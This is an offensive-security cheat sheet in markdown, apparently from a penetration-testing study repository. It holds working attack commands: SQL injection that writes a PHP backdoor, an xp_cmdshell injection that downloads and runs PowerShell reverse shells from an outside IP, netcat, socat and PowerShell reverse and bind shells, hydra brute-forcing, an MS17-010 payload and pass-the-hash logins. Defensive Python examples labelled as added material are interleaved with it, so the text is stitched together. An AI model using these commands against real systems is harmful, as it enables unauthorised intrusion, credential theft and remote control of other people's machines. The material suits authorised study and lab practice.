exploitation.md

File metadata and controls

423 lines (358 loc) · 12 KB

Exploitation

General

tcpdump

sudo tcpdump -n -i <INTERFACE> port <LISTENING PORT>
sudo tcpdump -n -i tun0 port 80

Exploitation Web application

When modifying web exploits, there are several key questions we generally need to ask while approaching the code:

  • Does it initiate an HTTP or HTTPS connection?
  • Does it access a web application specific path or route?
  • Does the exploit leverage a pre-authentication vulnerability?
  • If not, how does the exploit authenticate to the web application?
  • How are the GET or POST requests crafted to trigger and exploit the vulnerability?
  • Does it rely on default application settings (such as the web path of the application) that may have been changed after installation?
  • Will oddities such as self-signed certificates disrupt the exploit?

SQL Injection

  • Use a single quote (') and inject it into every parameter, then look for possible errors.
  • Use # or -- for comments after the injection. (After -- a space is required.)
    • If the -- ends up in a URL, add something after the space so the space doesn't get truncated. For example -- \\
  • If returning multiple rows gives errors, use LIMIT 1 in the query.
  • Use ORDER BY to find the number of columns. Increment it by 1 until no output is shown.
  • Use load_file('C:/Windows/System32/drivers/etc/hosts') to read files instead of database data.
  • Use "<?php echo shell_exec($_GET['cmd']);?>" INTO OUTFILE '<PATH TO WEBROOT>/backdoor.php' to create a simple PHP backdoor.

Manual SQL injection

  1. Find the SQL injection
    • Use a single quote (') to look for possible errors.
    • A vulnerable value, for example, is artist=1
  2. Find the number of columns
    • Use artist=1 ORDER BY 1. Increment it by 1 until no output or an error is given. If artist=1 ORDER BY 4 gives an error, the number of columns is 3.
  3. Use a union based SQL injection
    • Use artist=1 union select 1,2,3 (one value per column). If no other output is given:
      • Use an id that returns no rows, so only the union output shows: artist=-1 union select 1,2,3
      • If it's a string, use artist=-1 union select NULL,NULL,NULL
  4. Fetch the name of the database and version/current user
    • artist=-1 union select 1,database(),3
    • -1 union select 1,version(),current_user()
  5. Fetch the table names inside the database
    • Retrieve all table names
      • artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()
    • Get first table name (Limited by first because of the limit 0,1)
      • artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 0,1
    • Get the second table name (Limited by second because of the limit 1,1)
      • artist=-1 union select 1,table_name,3 from information_schema.tables where table_schema=database() limit 1,1
    • Get the rest of the table names
  6. Retrieve columns names
    • artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='<TABLE>'
  7. Get data out of the columns
    • artist=-1 union select 1,group_concat(<COLUMN>),3 from <TABLE>
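To see why steps 2 and 3 above behave the way they do, here is an added example (not code from these notes) of the query shape that makes them work, beside the parameterized form that does not. It runs the ORDER BY column-count probe and a UNION read against both. The data is constructed in an in-memory SQLite database; the table and column names (artists, users, login) are assumptions chosen to match the artist=1 example.

```python
import sqlite3


def make_db():
    """Constructed sample data in an in-memory SQLite database (assumed schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE artists (id INTEGER, name TEXT, country TEXT);
        INSERT INTO artists VALUES (1, 'Alice', 'NL'), (2, 'Bob', 'DE');
        CREATE TABLE users (id INTEGER, login TEXT, pw_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'hash-placeholder');
    """)
    return con


def lookup_vulnerable(con, artist):
    """Vulnerable form: the request parameter is pasted into the SQL text, so an
    ORDER BY or UNION appended to artist= is parsed as part of the query."""
    sql = "SELECT id, name, country FROM artists WHERE id=" + artist
    try:
        return con.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        return "ERROR: " + str(exc)  # the error message the page says to watch for


def lookup_safe(con, artist):
    """Hardened form: validate the type, then bind the value as a parameter.
    The value is never interpreted as SQL, so the probes return nothing."""
    try:
        artist_id = int(artist)
    except ValueError:
        return []
    return con.execute(
        "SELECT id, name, country FROM artists WHERE id=?", (artist_id,)
    ).fetchall()


def count_columns(con, lookup, limit=50):
    """Step 2 of the page: raise ORDER BY n until the query errors or returns
    nothing. The column count is the last n that still worked (0 = probe failed)."""
    for n in range(1, limit + 1):
        result = lookup(con, f"1 ORDER BY {n}")
        if isinstance(result, str) or result == []:
            return n - 1
    return limit


if __name__ == "__main__":
    db = make_db()
    print("columns (vulnerable):", count_columns(db, lookup_vulnerable))
    print("columns (safe):      ", count_columns(db, lookup_safe))
    probe = "-1 union select 1,group_concat(login),3 from users"
    print("union (vulnerable):", lookup_vulnerable(db, probe))
    print("union (safe):      ", lookup_safe(db, probe))
```

The -1 in the union probe is what the page's step 3 describes: it makes the first SELECT return no rows, so only the attacker-controlled row is displayed. In the safe variant the same string fails the int() check before any SQL runs.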

Using SQLmap

  • Send the request you want to fuzz through Burp and save it to a file.
  • Use the --batch flag to answer the prompts with their defaults
  • Use the --wizard flag for easy mode
  • Use the --os-shell flag for easy shell

Run SQLmap and check for vulnerabilities

sqlmap -r <BURP REQUEST FILE>

Print banner to show SQL injection works

sqlmap -r <BURP REQUEST FILE> --banner

Retrieve Database names

sqlmap -r <BURP REQUEST FILE> --dbs

Retrieve table names from database

sqlmap -r <BURP REQUEST FILE> -D <DATABASE> --tables

Retrieve columns out of table

sqlmap -r <BURP REQUEST FILE> -D <DATABASE> -T <TABLE> --columns

Extract data from the selected columns

sqlmap -r <BURP REQUEST FILE> -D <DATABASE> -T <TABLE> -C <COLUMN>,<COLUMN> --dump

Dump everything

sqlmap -r <BURP REQUEST FILE> --dump

MySQL Commands

show grants;
show variables;
show databases;
use <DATABASE>;
show tables;
describe <TABLE>;
SELECT * FROM <TABLE>;

MSSQL

Mssql connect

mssql-cli -S 10.11.1.31 -U sa -P 'poiuytrewq'

Enable XP_Cmdshell

EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Execute commands

xp_cmdshell 'whoami'

Random injection shell

a ') EXEC xp_cmdshell 'powershell.exe iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/amsi.txt''); iex (New-Object Net.WebClient).DownloadString(''http://10.10.14.143:8090/Invoke-PowerShellTcp2.ps1'')'; --

Webserver shells checklist

  • Check which languages the webserver supports:
    • IIS = .asp, .aspx
    • PHP = .php
    • Java = .jsp

File upload

File upload intruder extensions list

/opt/SecLists/Discovery/Web-Content/web-extensions.txt
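That extension list is what an upload filter gets tested against. The following is an added example (not code from these notes) of a weak blocklist check beside an allowlist check that holds up against what the list exercises: alternative extensions, mixed case, double extensions and an embedded NUL byte. The extension sets and sample filenames are assumptions.

```python
import os
import unicodedata

# Assumed policy: what a naive filter forbids, and what a strict filter permits.
BLOCKED = {".php", ".asp", ".aspx", ".jsp"}
ALLOWED = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def blocklist_check(filename):
    """Weak: rejects only an exact, lowercase final extension from a short list.
    .phtml, .pHp, shell.php.jpg and shell.php<NUL>.jpg all get through."""
    _, ext = os.path.splitext(filename)
    return ext not in BLOCKED


def allowlist_check(filename):
    """Safer: normalize, reject control characters (NUL included), strip any
    path, require exactly one extension, and accept only allowlisted ones."""
    name = unicodedata.normalize("NFKC", filename)
    if any(ord(c) < 32 for c in name):
        return False
    name = os.path.basename(name.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return "." + parts[1] in ALLOWED


def compare(filenames):
    """Return {filename: (blocklist verdict, allowlist verdict)}."""
    return {f: (blocklist_check(f), allowlist_check(f)) for f in filenames}


if __name__ == "__main__":
    # Constructed sample uploads
    samples = ["photo.jpg", "Photo.JPG", "shell.php", "shell.phtml",
               "shell.pHp", "shell.php.jpg", "shell.php\x00.jpg"]
    for name, (weak, strict) in compare(samples).items():
        print(f"{name!r:25} blocklist={weak!s:5} allowlist={strict}")
```

The allowlist version still needs to be paired with a server that never executes files from the upload directory and that stores them under a generated name; the filename check alone is only the first layer.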

Services

FTP

  • Check if login is allowed as anonymous:anonymous.
ftp <IP>
# Enter anonymous twice (username and password)

POP read emails

nc -nvC <IP> <PORT>
USER <USERNAME>
PASS <PASSWORD>
LIST
RETR 1 
RETR 2

MSRPC login

evil-winrm -u <USER> -p <PASS> -i <IP>

Password Attacks

https://github.com/danielmiessler/SecLists

Hydra bruteforce FTP

hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ftp://<IP>:<PORT>

Hydra bruteforce SSH

hydra -L <USERNAMEFILE> -P <PASSWORDFILE> -t 24 ssh://<IP>:<PORT>

Hydra bruteforce HTTP login

Log in while proxying through Burp, or inspect the request in the browser's developer tools, to get the required information: the username, password and login parameter names and the error message shown on a failed login.

https://redteamtutorials.com/2018/10/25/hydra-brute-force-https/

hydra -L <USERNAMEFILE> -P <PASSWORDFILE> <IP> http-post-form "<LOGINPAGE>:<COOKIES FROM BURP AND SET ^USER^ AND ^PASS^>:<ERROR MESSAGE FAILED LOGIN>"

#EXAMPLE hydra -L usernames.txt -P passwords.txt 192.168.2.62 http-post-form "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed"

#EXAMPLE hydra -l admin -P /opt/SecLists/Passwords/xato-net-10-million-passwords-100.txt 10.10.175.0 http-post-form '/Account/login.aspx?ReturnURL=/admin:__VIEWSTATE=u8hdjDohYmqfI8o0z7Cev4b1u0jLmv9dNA9NS95wDsZeMYw6zBFeyhiLx1QuOsZ%2FXV%2Fo%2BrCdXSC4Y7%2FueaRnmboaQQ9KZQWLME84zysowmYTAW8Kea1%2Bp7phoEwMiICbLwPPteDEYl7z6nobm8x1Mb2hMDiTpDJhracgmTh%2BJwP1Rqqt&__EVENTVALIDATION=QJmkftZnDEcQIPsstxYKnQBDsulZLsB0kmrbMa4BPzAc%2FMEDChrOmztni5OWBx83r2xGNndCAgw6wJ%2F%2FoAzYtZEcyRWC%2FaPyUR5iWSO0V8%2FIodobow1OxiuoD9uZVnVO8tcQZr3NWYjFcOVxYg5WAWvPyezvfcBk2oxUdZwsutPATiKB&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:failed'
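Seen from the web server, a run like the DVWA example above is a burst of POSTs to one login path from one address. Here is an added example (not from these notes) of the detection side: it parses access log lines in Apache combined format and flags any source that sends a threshold number of login POSTs inside a sliding window. The log lines are constructed samples and the window and threshold are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Apache/nginx combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for a well-formed line, None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def find_login_bursts(lines, login_path, window=timedelta(seconds=60), threshold=20):
    """Return {ip: total login POSTs} for every source that made at least
    `threshold` POSTs to login_path within any `window`-long span."""
    attempts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] == login_path:
            attempts[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in attempts.items():
        stamps.sort()
        start = 0
        for end in range(len(stamps)):
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = len(stamps)
                break
    return flagged


def build_sample_log():
    """Constructed sample: one host firing 40 POSTs in ten seconds (the shape a
    multi-threaded hydra run produces) plus a legitimate user's two logins."""
    base = datetime(2018, 10, 25, 10, 0, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(40):
        ts = (base + timedelta(milliseconds=250 * i)).strftime(TS_FMT)
        lines.append(f'192.168.2.62 - - [{ts}] "POST /dvwa/login.php HTTP/1.1" 200 1043')
    for offset, status in ((0, 200), (300, 302)):   # one failure, one success
        ts = (base + timedelta(seconds=offset)).strftime(TS_FMT)
        lines.append(f'10.0.0.5 - - [{ts}] "POST /dvwa/login.php HTTP/1.1" {status} 312')
    lines.append('10.0.0.5 - - [25/Oct/2018:10:05:01 +0000] "GET /dvwa/index.php HTTP/1.1" 200 5120')
    lines.append("garbage line that should be ignored")
    return lines


if __name__ == "__main__":
    print(find_login_bursts(build_sample_log(), "/dvwa/login.php"))
```

Counting POSTs rather than failures keeps the rule independent of the status code, which matters because many applications answer a failed login with 200 and an error page, exactly the string hydra matches on.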

CEWL - Create a wordlist

cewl <URL> -m <MIN CHARS> -w <FILE>.txt

Identify hashes

hashid <HASH>
hash-identifier

Combine /etc/passwd and /etc/shadow with unshadow

unshadow <PASSWD FILE> <SHADOW FILE> > unshadow.txt
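What unshadow actually does is a join of the two files on the username, replacing the x placeholder in the second field of passwd with the hash from the second field of shadow. Here is an added example (not code from these notes, and not the unshadow tool itself) that performs that join on constructed passwd and shadow entries and then separates the entries a cracker can work on from locked accounts. All hash values are constructed placeholders.

```python
# Constructed sample entries; the hash strings are placeholders, not real hashes.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
alice:x:1000:1000:Alice:/home/alice:/bin/bash
bob:x:1001:1001:Bob:/home/bob:/bin/bash
"""
SHADOW_SAMPLE = """\
root:$6$constructedsalt$constructedhashroot:18000:0:99999:7:::
daemon:*:18000:0:99999:7:::
alice:$6$constructedsalt$constructedhashalice:18000:0:99999:7:::
bob:!$6$constructedsalt$constructedhashbob:18000:0:99999:7:::
"""


def parse_colon_file(text):
    """Map the first field (username) to the list of fields of each entry."""
    entries = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        entries[fields[0]] = fields
    return entries


def unshadow(passwd_text, shadow_text):
    """Replace field 2 of every passwd entry with field 2 of the matching
    shadow entry; entries without a shadow line are left unchanged."""
    shadow = parse_colon_file(shadow_text)
    merged = []
    for name, fields in parse_colon_file(passwd_text).items():
        if name in shadow:
            fields = fields[:]
            fields[1] = shadow[name][1]
        merged.append(":".join(fields))
    return merged


def crackable_entries(lines):
    """Keep only entries whose hash field holds a hash: '*' and '!' prefixes mark
    locked or passwordless accounts, 'x' means no shadow entry was found."""
    kept = []
    for line in lines:
        hash_field = line.split(":")[1]
        if hash_field and hash_field != "x" and not hash_field.startswith(("*", "!")):
            kept.append(line)
    return kept


if __name__ == "__main__":
    for entry in crackable_entries(unshadow(PASSWD_SAMPLE, SHADOW_SAMPLE)):
        print(entry)
```

The bob entry shows the locked-account convention: a leading ! in the shadow hash field (what passwd -l writes) means the hash is intact but the account cannot log in, so there is no point feeding it to a cracker.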

NFS Shares

Portmapper and RPCBind run on TCP port 111

Enumerations

rpcinfo <IP>
sudo nmap -sSUC -p111 <IP> --script '*nfs*'

Mount shares

showmount -e <IP>
sudo mount -o nolock <IP>:/<SHARE> <MOUNT LOCATION>
sudo mount -t cifs -o port=<PORT> //<IP>/<SHARE> -o username=<USERNAME>,password=<PASSWORD> /mnt/<FOLDER>

Open a file you have no permission for

If a file is found that we want to access but don't have permissions for: create a user with the same username as the file owner, change its UID in /etc/passwd to the owner's UID, then switch to that user so we can access the file.

sudo adduser pwn
sudo vim /etc/passwd

Shells

Listeners

Netcat listener

sudo nc -nlvp <PORT>

Socat listener

sudo socat -d -d TCP4-LISTEN:<PORT> STDOUT

Meterpreter listener

msfconsole
use multi/handler
set payload <PAYLOAD>
run

Powercat listener

. ./powercat.ps1
powercat -l -v -p 10000

Reverse shells

Netcat

nc -nv <IP> <PORT> -e /bin/bash

Socat

socat TCP4:<IP>:<PORT> EXEC:/bin/bash

Powershell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('<IP>',<PORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i =$stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell.exe iex (iwr http://<IP>/Invoke-PowerShellTcp.ps1 -usebasicparsing);Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>

Powercat

powercat -c <IP> -p <PORT> -e cmd.exe

Bind shells

Netcat

nc -nlvp <PORT>

Powershell

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('<IP>',<PORT>);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Powercat

powercat -l -p <PORT> -e cmd.exe

Spawn TTY Shells

python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import os; os.system("/bin/bash")'
/bin/sh -i
perl -e 'exec "/bin/sh";'
# from within perl: exec "/bin/sh";
# from within ruby: exec "/bin/sh"

Fully interactive stable shell (zsh)

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo; fg
# press Enter twice
export TERM=xterm-256color

Fully interactive stable shell (bash)

python3 -c 'import pty;pty.spawn("/bin/bash")'
Ctrl + Z
stty raw -echo
fg
fg
export TERM=xterm-256color
stty rows 46 cols 140

Enable tab completion

  1. In your active shell, use bg to send your nc session to the background
  2. Enter stty raw -echo
  3. Enter fg to bring your nc session to the foreground
  4. Enter export TERM=xterm-256color

MSFvenom payloads

Misc

MS17-010

git clone https://github.com/helviojunior/MS17-010
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
nc -lnvp <PORT>
python send_and_execute.py <TARGET IP> ms17-010.exe

PHP Execute commands

<?php
// Return the listing of the directory where the file runs (Windows)
system("dir");
?>
<?php
// Executes but returns nothing
exec("ls -la");
?>
<?php
// Executes, returns the entire output as a string
echo shell_exec("ls -la");
?>
<?php
// Executes and writes the raw output straight to the response
passthru("ls -la");
?>

Path traversal cheatsheet files

https://gracefulsecurity.com/path-traversal-cheat-sheet-windows/

Pass the hash login

The first form uses the empty LM hash (aad3b435b51404eeaad3b435b51404ee); the last form, with the LM part left blank, should work as well.

pth-winexe -U <USERNAME>%aad3b435b51404eeaad3b435b51404ee:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%<LM HASH>:<NTLM HASH> //<IP> cmd
pth-winexe -U <USERNAME>%:<NTLM HASH> //<IP> cmd

Mysql raptor exploit but better

https://www.exploit-db.com/exploits/46249

Bash fully interactive shell

Start a /bin/bash shell outside tmux
nc -lvp <PORT>
python -c 'import pty;pty.spawn("/bin/bash")'
Ctrl+Z
stty raw -echo
fg
export TERM=screen